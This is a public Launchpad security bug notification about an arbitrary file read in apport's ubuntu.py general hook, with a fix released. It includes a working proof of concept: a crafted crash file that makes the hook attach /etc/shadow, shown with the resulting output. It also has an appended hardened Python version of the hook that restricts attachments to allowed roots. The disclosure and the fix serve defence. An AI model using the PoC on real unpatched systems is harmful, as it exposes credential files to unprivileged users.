[Bug 1934308] Re: Arbitrary file read in general hook (ubuntu.py)
Marc Deslauriers
1934308 at bugs.launchpad.net
Thu Sep 16 11:40:47 UTC 2021
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1934308
Title:
Arbitrary file read in general hook (ubuntu.py)
Status in apport package in Ubuntu:
Fix Released
Bug description:
While reviewing Apport's general hooks it was found that the hook
`apport/general-hooks/ubuntu.py` includes user-controlled files when
handling `emacs`-related reports:
if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
    # emacs add-on packages trigger byte compilation, which might fail
    # we are very interested in reading the compilation log to determine
    # where to reassign this report to
    regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
    if attachment in report and re.search(regex, log_file, re.MULTILINE):
        for line in log_file.split('\n'):
            m = re.search(r'^!! and attach the file (\S+)', line)  # [0]
            if m:
                path = m.group(1)
                apport.hookutils.attach_file_if_exists(report, path)  # [1]
After using a regular expression to extract the file to attach [0],
the extracted file subsequently gets attached to the report file [1].
With automatic crash reporting enabled the following PoC (tested on
20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective
report file:
cat << EOF > /var/crash/poc.crash
ProblemType: Package
ExecutablePath: /poc
Package: emacs22
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
!! and attach the file /etc/shadow
EOF
grep -A5 DpkgTerminal /var/crash/poc.crash
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
!! and attach the file /etc/shadow
.etc.shadow:
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
Best regards!
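The following is an added example, not code from the bug report or from apport, showing the defensive shape the hook logic above is missing: the path taken from the user-controlled DpkgTerminalLog is resolved and only attached when it is a regular file under an allowed root. It assumes a hypothetical allowed root (a temp directory standing in for wherever byte-compile logs are expected) and models the report as a plain dict instead of apport's Report object.

```python
import os
import re
import tempfile

FAILED_RE = re.compile(r'^!! Byte-compilation for x?emacs\S+ failed!', re.MULTILINE)  # from the hook
ATTACH_RE = re.compile(r'^!! and attach the file (\S+)')                             # from the hook
EMACS_PACKAGES = ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']

def requested_paths(log_text):
    """Paths the (user-controlled) DpkgTerminalLog asks the hook to attach."""
    if not FAILED_RE.search(log_text):
        return []
    return [m.group(1) for m in map(ATTACH_RE.search, log_text.split('\n')) if m]

def attach_file_if_allowed(report, path, allowed_roots):
    """Attach `path` only if it resolves to a regular file inside one of `allowed_roots`.
    Symlinks are resolved first, so a link pointing out of the root is refused too."""
    real = os.path.realpath(path)
    roots = [os.path.realpath(r) for r in allowed_roots]
    if not any(real == r or real.startswith(r + os.sep) for r in roots):
        return False
    if not os.path.isfile(real):  # also refuses directories, devices, dangling links
        return False
    with open(real, 'r', errors='replace') as f:
        report[path.replace('/', '.')] = f.read()  # apport-style key, e.g. .etc.shadow
    return True

def handle_emacs_report(report, allowed_roots):
    """Hardened counterpart of the quoted hook logic; returns the keys it attached."""
    if report.get('Package') not in EMACS_PACKAGES or 'DpkgTerminalLog' not in report:
        return []
    attached = []
    for path in requested_paths(report['DpkgTerminalLog']):
        if attach_file_if_allowed(report, path, allowed_roots):
            attached.append(path.replace('/', '.'))
    return attached

def demo():
    """Constructed scenario: one real compile log under the allowed root plus the PoC's /etc/shadow request."""
    root = tempfile.mkdtemp()  # hypothetical allowed root, constructed for the demo
    log_path = os.path.join(root, 'emacs22', 'CompilationLog')
    os.makedirs(os.path.dirname(log_path))
    with open(log_path, 'w') as f:
        f.write('byte-compile error: foo.el\n')
    log = ('!! Byte-compilation for emacs22 failed!\n!! and attach the file %s\n'
           '!! and attach the file /etc/shadow\n' % log_path)
    report = {'ProblemType': 'Package', 'Package': 'emacs22', 'DpkgTerminalLog': log}
    return handle_emacs_report(report, [root]), report
```

Running `demo()` attaches only the compile log under the allowed root; the `/etc/shadow` request is silently refused, which is the behaviour the original `attach_file_if_exists` call lacks.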